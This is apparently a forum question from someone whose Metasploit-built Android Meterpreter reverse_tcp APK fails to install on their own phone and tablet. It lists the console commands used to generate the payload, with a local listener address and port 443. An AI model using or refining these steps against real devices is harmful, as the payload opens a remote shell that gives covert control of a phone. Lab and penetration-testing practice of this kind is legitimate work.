I am trying to install a hacked apk on an android device (GT - 19300 and SGS Tab S 10.5). My problem is, that it is not installing that apk neither on my phone nor on my tab. It keeps saying, that the application could not be installed... Phone is running Android 4.3 (rooted!) and Tab is running Android 5.0.2. I've created the apk on metasploit pro console (windows) with the following commands:
use android/meterpreter/reverse_tcp
set LHOST 192.168.2.107
set LPORT 443
generate -t raw -f //PATH
Help is apprectiated